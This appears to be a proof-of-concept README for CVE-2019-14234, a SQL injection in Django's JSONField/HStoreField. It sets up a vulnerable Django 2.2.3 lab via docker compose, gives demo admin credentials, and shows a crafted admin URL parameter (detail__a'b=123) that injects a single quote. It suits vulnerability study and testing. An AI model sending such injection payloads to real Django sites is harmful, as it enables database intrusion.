POC-Django JSONField/HStoreField SQL Injection Vulnerability (CVE-2019-14234)# POC-Django JSONField/HStoreField SQL Injection Vulnerability Exploit (CVE-2019-14234)
Django released a security update on August 1, 2019, which fixes a SQL injection vulnerability in the two model fields of JSONField and HStoreField.
Reference link:
https://www.djangoproject.com/weblog/2019/aug/01/security-releases/
https://www.leavesongs.com/PENETRATION/django-jsonfield-cve-2019-14234.html
The vulnerability requires the developer to use JSONField/HStoreField; moreover, the field name of the queryset can be controlled. Django's built-in application Django-Admin is affected, which gives us an easy way to reproduce the vulnerability.
## Start Vulnerability Application
Compile and start a vulnerable Django 2.2.3 by executing the following command:
```
docker compose build
docker compose up -d
```
After the environment is started, you can see the home page of Django at http://your-ip:8000.
## Vulnerability Reproduce
First, log in to the Django-Admin `http://your-ip:8000/admin/` with username `admin` and password `a123123123`.
Then go to the list-view `http://your-ip:8000/admin/vuln/collection/` of the model `Collection`:
Add `detail__a'b=123` to the GET parameter, where `detail` is the JSONField:
http://your-ip:8000/admin/vuln/collection/?detail__a%27b=123
You can see that the single quote has been injected successfully, and the SQL statement reports an error:
[4.0K] /data/pocs/7faf51b522a4cf54e67bfbd4db1d3b6790c406b7
├── [ 584] 0001_initial.py
├── [ 126] admin.py
├── [ 83] apps.py
├── [ 558] collection.json
├── [ 203] docker-compose.yml
├── [ 372] docker-entrypoint.sh
├── [ 293] Dockerfile
├── [ 0] __init__.py
├── [ 632] manage.py
├── [ 234] models.py
├── [1.4K] README.md
├── [3.1K] settings.py
├── [ 754] urls.py
└── [ 401] wsgi.py
0 directories, 14 files